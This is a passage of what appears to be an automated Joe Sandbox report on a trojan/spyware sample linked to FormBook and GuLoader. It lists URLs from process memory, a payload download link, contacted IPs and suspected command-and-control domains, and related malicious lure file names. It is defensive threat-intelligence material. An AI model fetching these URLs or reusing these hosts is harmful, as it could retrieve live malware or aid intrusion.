                                                                                http://www.jcsa.info/Education_Seminars.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImkHpfNG0waitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-boldwaitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://i1.cdn-image.com/__media__/pics/28905/arrrow.png)waitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefixwaitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://www.jcsa.info/Course_Descriptions.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImlQhpf8waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://www.jcsa.info/Education_Grant.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImkHpfNG0JHswaitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://duckduckgo.com/?q=waitfor.exe, 00000004.00000002.33485556560.0000000008322000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eotwaitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://aballanet.cat/4300/?iS=d94ZcmMq/ThngNvhRkyBH4O0kUOwnOVlpzbjHd6waitfor.exe, 00000004.00000002.33483552747.00000000071A0000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=FxK39HI69.4.drfalse
                                                                                            		high
                                                                                            http://www.jcsa.info/__media__/js/trademark.php?d=jcsa.info&type=dfltwaitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmp, waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            http://nsis.sf.net/NSIS_ErrorError02Eh1ah35H.exefalse
                                                                                              		high
                                                                                              http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regularwaitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woffwaitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2waitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://i2.cdn-image.com/__media__/pics/29590/bg1.png)waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttfwaitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttfwaitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-boldwaitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://www.register.com?trkID=WSTm3u15CWwaitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmp, waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            http://www.quovadis.bm002Eh1ah35H.exe, 00000002.00000003.28344629314.0000000003003000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28458149111.0000000002FFC000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28458638393.0000000003000000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000002.28562483548.0000000003003000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28458259978.0000000003000000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28458503054.0000000002FFC000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28513958061.0000000003003000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28344854813.0000000003003000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              http://www.jcsa.info/Japanese_Language_School.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImlwaitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              		unknown
                                                                                                              http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttfwaitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                http://www.jcsa.info/Business_Degrees.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImlQhpf8k8ywaitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                • Avira URL Cloud: safe
                                                                                                                		unknown
                                                                                                                https://gemini.google.com/app?q=waitfor.exe, 00000004.00000002.33485556560.00000000082B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefixwaitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://claimstakes.online/=waitfor.exe, 00000004.00000002.33485556560.0000000008303000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    		unknown
                                                                                                                    http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefixwaitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://dts.gnpge.comwaitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      https://babalharra.com.au/BJuAryIbeCLh111.binRB02Eh1ah35H.exe, 00000002.00000002.28561928458.0000000002FD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      https://claimstakes.online/5waitfor.exe, 00000004.00000002.33485556560.0000000008303000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      https://cdn.consentmanager.netwaitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://claimstakes.online/;waitfor.exe, 00000004.00000002.33487548147.00000000089B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        http://www.jcsa.info/Career_Counseling.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImkHpfNG0Jwaitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        http://www.jcsa.info/College_Information.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImkHpfNGwaitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        http://i2.cdn-image.com/__media__/pics/28903/search.png)waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://babalharra.com.au/02Eh1ah35H.exe, 00000002.00000002.28561928458.0000000002FB5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          http://www.jcsa.info/Language_Learning.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImkHpfNG0Jwaitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                          • Avira URL Cloud: safe
                                                                                                                          		unknown
                                                                                                                          http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regularwaitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://www.Jcsa.infowaitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmp, waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            https://claimstakes.online/Jwaitfor.exe, 00000004.00000002.33487548147.00000000089B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            https://www.google.com/images/branding/product/ico/googleg_alldp.icowaitfor.exe, 00000004.00000002.33485556560.00000000082B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eotwaitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd02Eh1ah35H.exe, 00000002.00000001.28252790444.00000000005F2000.00000020.00000001.01000000.00000005.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://i1.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefixwaitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://i1.cdn-image.com/__media__/pics/8934/rcomlogo.jpgwaitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://www.jcsa.info/Best_Online_University.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImlQhwaitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      		unknown
                                                                                                                                      http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otfwaitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-21402Eh1ah35H.exe, 00000002.00000001.28252790444.0000000000649000.00000020.00000001.01000000.00000005.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eotwaitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://i1.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otfwaitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://claimstakes.online/waitfor.exe, 00000004.00000002.33480610058.0000000003427000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000004.00000002.33480610058.00000000033E3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                              		unknown
                                                                                                                                              http://i1.cdn-image.com/__media__/pics/28903/search.png)waitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://ocsp.quovadisoffshore.com002Eh1ah35H.exe, 00000002.00000003.28344629314.0000000003003000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28458149111.0000000002FFC000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28458638393.0000000003000000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000002.28562483548.0000000003003000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28458259978.0000000003000000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28458503054.0000000002FFC000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28513958061.0000000003003000.00000004.00000020.00020000.00000000.sdmp, 02Eh1ah35H.exe, 00000002.00000003.28344854813.0000000003003000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://claimstakes.online/%waitfor.exe, 00000004.00000002.33485556560.0000000008303000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  		unknown
                                                                                                                                                  https://delivery.consentmanager.netwaitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://www.jcsa.info/Community_College_Search.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImlwaitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    		unknown
                                                                                                                                                    http://www.register.com/?trkID=WSTm3u15CWwaitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmp, waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    		unknown
                                                                                                                                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icowaitfor.exe, 00000004.00000002.33485556560.0000000008322000.00000004.00000020.00020000.00000000.sdmp, FxK39HI69.4.drfalse
                                                                                                                                                      		high
                                                                                                                                                      http://www.jcsa.info/display.cfmwaitfor.exe, 00000004.00000002.33483552747.00000000069C6000.00000004.10000000.00040000.00000000.sdmp, waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      		unknown
                                                                                                                                                      http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eotwaitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://i2.cdn-image.com/__media__/pics/28905/arrrow.png)waitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://i2.cdn-image.com/__media__/pics/8934/rcomlogo.jpgwaitfor.exe, 00000004.00000002.33485337967.0000000007F00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://babalharra.com.au/BJuAryIbeCLh111.binG02Eh1ah35H.exe, 00000002.00000002.28561928458.0000000002FD2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                            		unknown

                                                                                                                                                            World Map of Contacted IPs

                                                                                                                                                            • No. of IPs < 25%
                                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                                            • 75% < No. of IPs

                                                                                                                                                            Public IPs

                                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                            209.74.77.109
                                                                                                                                                            		www.greenthub.lifeUnited States
                                                                                                                                                            		31744MULTIBAND-NEWHOPEUStrue
                                                                                                                                                            13.248.169.48
                                                                                                                                                            		www.remedies.proUnited States
                                                                                                                                                            		16509AMAZON-02UStrue
                                                                                                                                                            104.21.40.167
                                                                                                                                                            		www.zkdamdjj.shopUnited States
                                                                                                                                                            		13335CLOUDFLARENETUStrue
                                                                                                                                                            122.201.127.17
                                                                                                                                                            		babalharra.com.auAustralia
                                                                                                                                                            		38719DREAMSCAPE-AS-APDreamscapeNetworksLimitedAUfalse
                                                                                                                                                            76.223.54.146
                                                                                                                                                            		www.optimismbank.xyzUnited States
                                                                                                                                                            		16509AMAZON-02UStrue
                                                                                                                                                            27.124.4.246
                                                                                                                                                            		r0lqcud7.nbnnn.xyzSingapore
                                                                                                                                                            		64050BCPL-SGBGPNETGlobalASNSGtrue
                                                                                                                                                            103.224.182.242
                                                                                                                                                            		www.madhf.techAustralia
                                                                                                                                                            		133618TRELLIAN-AS-APTrellianPtyLimitedAUtrue
                                                                                                                                                            208.91.197.39
                                                                                                                                                            		www.jcsa.infoVirgin Islands (BRITISH)
                                                                                                                                                            		40034CONFLUENCE-NETWORK-INCVGtrue
                                                                                                                                                            154.23.178.231
                                                                                                                                                            		43kdd.topUnited States
                                                                                                                                                            		174COGENT-174UStrue
                                                                                                                                                            134.0.14.158
                                                                                                                                                            		aballanet.catSpain
                                                                                                                                                            		197712CDMONsistemescdmoncomEStrue
                                                                                                                                                            202.92.5.23
                                                                                                                                                            		thaor56.onlineViet Nam
                                                                                                                                                            		45899VNPT-AS-VNVNPTCorpVNtrue
                                                                                                                                                            101.35.209.183
                                                                                                                                                            		www.yc791022.asiaChina
                                                                                                                                                            		132203TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNtrue
                                                                                                                                                            172.67.167.146
                                                                                                                                                            		www.rgenerousrs.storeUnited States
                                                                                                                                                            		13335CLOUDFLARENETUStrue
                                                                                                                                                            43.205.198.29
                                                                                                                                                            		www.1secondlending.oneJapan4249LILLY-ASUStrue
                                                                                                                                                            74.48.143.82
                                                                                                                                                            		bpgroup.siteCanada
                                                                                                                                                            		14663TELUS-3CAtrue
                                                                                                                                                            46.30.211.38
                                                                                                                                                            		www.bankseedz.infoDenmark
                                                                                                                                                            		51468ONECOMDKtrue

                                                                                                                                                            General Information

                                                                                                                                                            Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                            Analysis ID:1588655
                                                                                                                                                            Start date and time:2025-01-11 03:51:25 +01:00
                                                                                                                                                            Joe Sandbox product:CloudBasic
                                                                                                                                                            Overall analysis duration:0h 17m 18s
                                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                                            Report type:full
                                                                                                                                                            Cookbook file name:default.jbs
                                                                                                                                                            Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                                                                                                                                            Run name:Suspected Instruction Hammering
                                                                                                                                                            Number of analysed new started processes analysed:5
                                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                                            Number of injected processes analysed:1
                                                                                                                                                            Technologies:
                                                                                                                                                            • HCA enabled
                                                                                                                                                            • EGA enabled
                                                                                                                                                            • AMSI enabled
                                                                                                                                                            Analysis Mode:default
                                                                                                                                                            Sample name:02Eh1ah35H.exe
                                                                                                                                                            Detection:MAL
                                                                                                                                                            Classification:mal100.troj.spyw.evad.winEXE@7/6@27/16
                                                                                                                                                            EGA Information:
                                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                                            HCA Information:
                                                                                                                                                            • Successful, ratio: 88%
                                                                                                                                                            • Number of executed functions: 62
                                                                                                                                                            • Number of non-executed functions: 288
                                                                                                                                                            Cookbook Comments:
                                                                                                                                                            • Found application associated with file extension: .exe
                                                                                                                                                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                                                                                                                                                            Warnings

                                                                                                                                                            • Max analysis timeout: 600s exceeded, the analysis took too long
                                                                                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe
                                                                                                                                                            • Excluded IPs from analysis (whitelisted): 142.250.190.99, 142.250.191.110, 142.250.111.84, 172.217.1.106, 142.250.190.138, 142.250.190.42, 142.250.191.170, 142.250.191.234, 172.217.2.42, 142.250.191.106, 172.217.0.170, 172.217.4.202, 142.250.191.202, 172.217.5.10, 142.250.190.106, 142.250.191.138, 142.250.190.74, 142.250.190.10, 142.250.190.35, 52.113.194.132
                                                                                                                                                            • Excluded domains from analysis (whitelisted): ecs.office.com, clients2.google.com, redirector.gvt1.com, edgedl.me.gvt1.com, accounts.google.com, claimstakes.online, update.googleapis.com, clientservices.googleapis.com, clients.l.google.com, www.googleapis.com
                                                                                                                                                            • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                            Simulations

                                                                                                                                                            Behavior and APIs

                                                                                                                                                            TimeTypeDescription
                                                                                                                                                            21:55:02API Interceptor29603339x Sleep call for process: waitfor.exe modified

                                                                                                                                                            Joe Sandbox View / Context

                                                                                                                                                            IPs

                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                            209.74.77.109suBpo1g13Q.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • www.greenthub.life/r3zg/
                                                                                                                                                            BcF3o0Egke.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • www.moviebuff.info/4r26/
                                                                                                                                                            KSts9xW7qy.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • www.dailyfuns.info/n9b0/?F4=Q0yHy&xP7x=A8VrqyfvUbO/Hw2LPQ1UsX5BwNVpcsHZj5dGp0FbdWJo87i+fAzGqY/WbkPjYDkNrmWhazG0hIjSjfnpkftd6thTTSLohUKEi8xodPTyp3tNekr0IM36mEI=
                                                                                                                                                            Invoice 10493.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • www.dailyfuns.info/n9b0/?IUY=A8VrqyfvUbO/Hw2LPQ4NsXlD/s5AVNHZj5dGp0FbdWJo87i+fAzGqYzWbkPjYDkNrmWhazG0hIjSjfnpkftd/stSTEWpskOuncpocPTypnt0UF6pA8n7oU4=&h7i-=tZtx
                                                                                                                                                            Document_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                            • www.greenthub.life/r3zg/?ChhG6=J-xs&2O=du4jOMLkh7fLnmDtVoK+d8rG/j+33GGjaV3EKcXkS3D/yxi6pio40SubWtKrR6Fw1AeDGXhTcKeneAqCGOT0/aNCu6YrtTGBPMZlno0p/0xRAVz3vwpdvYc=
                                                                                                                                                            Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • www.greenthub.life/r3zg/
                                                                                                                                                            A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • www.dailyfuns.info/n9b0/
                                                                                                                                                            W3MzrFzSF0.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                            • www.gogawithme.live/6gtt/
                                                                                                                                                            DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                                            • www.futuru.xyz/8uep/
                                                                                                                                                            PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • www.greenthub.life/r3zg/
                                                                                                                                                            13.248.169.48zAg7xx1vKI.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • www.aktmarket.xyz/wb7v/
                                                                                                                                                            SpCuEoekPa.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • www.sfantulandrei.info/wvsm/
                                                                                                                                                            suBpo1g13Q.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • www.optimismbank.xyz/98j3/
                                                                                                                                                            e47m9W6JGQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • www.bcg.services/5onp/
                                                                                                                                                            25IvlOVEB1.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • www.shipley.group/wfhx/
                                                                                                                                                            gH3LlhcRzg.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • www.autonomousoid.pro/m1if/
                                                                                                                                                            fFoOcuxK7M.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • www.bcg.services/5onp/
                                                                                                                                                            aBEh0fsi2c.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • www.fortevision.xyz/dash/
                                                                                                                                                            EIvidclKOb.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • www.sfantulandrei.info/wvsm/
                                                                                                                                                            bkTW1FbgHN.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • www.108.foundation/lnu5/

                                                                                                                                                            Domains

                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                            www.bankseedz.infosuBpo1g13Q.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 46.30.211.38
                                                                                                                                                            RFQ_P.O.1212024.scrGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 46.30.211.38
                                                                                                                                                            NEW.RFQ00876.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 46.30.211.38
                                                                                                                                                            Document_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                            • 46.30.211.38
                                                                                                                                                            Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 46.30.211.38
                                                                                                                                                            PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 46.30.211.38
                                                                                                                                                            www.remedies.proRecibos.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 13.248.169.48
                                                                                                                                                            DHL_734825510.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 13.248.169.48
                                                                                                                                                            SRT68.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 13.248.169.48
                                                                                                                                                            ek8LkB2Cgo.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 13.248.169.48
                                                                                                                                                            SW_5724.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 13.248.169.48
                                                                                                                                                            CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 13.248.169.48
                                                                                                                                                            CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 13.248.169.48
                                                                                                                                                            google.comLMSxhK1u8Z.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                            • 172.217.16.129
                                                                                                                                                            https://freesourcecodes70738.emlnk.com/lt.php?x=3DZy~GDLVnab5KCs-Nu4WOae1qEoiN9xvxk1XaPMVXahD5B9-Uy.xuW-242imNXGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 142.250.186.132
